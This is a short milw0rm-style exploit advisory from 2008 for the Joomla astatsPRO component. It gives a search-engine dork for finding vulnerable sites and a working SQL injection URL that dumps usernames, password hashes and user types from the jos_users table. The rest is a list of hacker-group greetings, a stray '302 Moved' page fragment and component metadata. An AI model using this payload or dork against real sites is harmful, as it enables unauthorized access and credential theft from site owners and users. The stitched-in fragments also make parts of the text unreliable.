-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Joomla Component astatsPRO Remote SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## bug found by ka0x ## D.O.M TEAM 2008 ## we are: ka0x, an0de, xarnuz ## http://www.domlabs.org/ ## contact: ka0x01[at]gmail.com ## from spain d0rk: allinurl: "com_astatspro" PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/* Look at the code of the page: 302 Moved

302 Moved

The document has moved here. greets: ssh-2, phnx, nettoxic, jns07, her0, JosS, Plexinium Team, FaLENcE, Hendrix, Piker, you_kn0w, Celciuz, Lady_Lara, The Shredder, RedHack Team, zickox, Furtivo. __EOF__ astatsPRO 16/07/2006 www.joom.la Copyright (c) 2006 mobico (Marcel Boettcher) info@joom.la http://astatspro.joom.la/ 1.0.0 1.0.0 [stable] Component - to count your visitors. Zählt ihre Besucher.

astatsPRO is based on: chCounter 3.1.1 (13|07|2005)©2005 www.Christoph Bachner.net

]]>
# milw0rm.com [2008-02-18]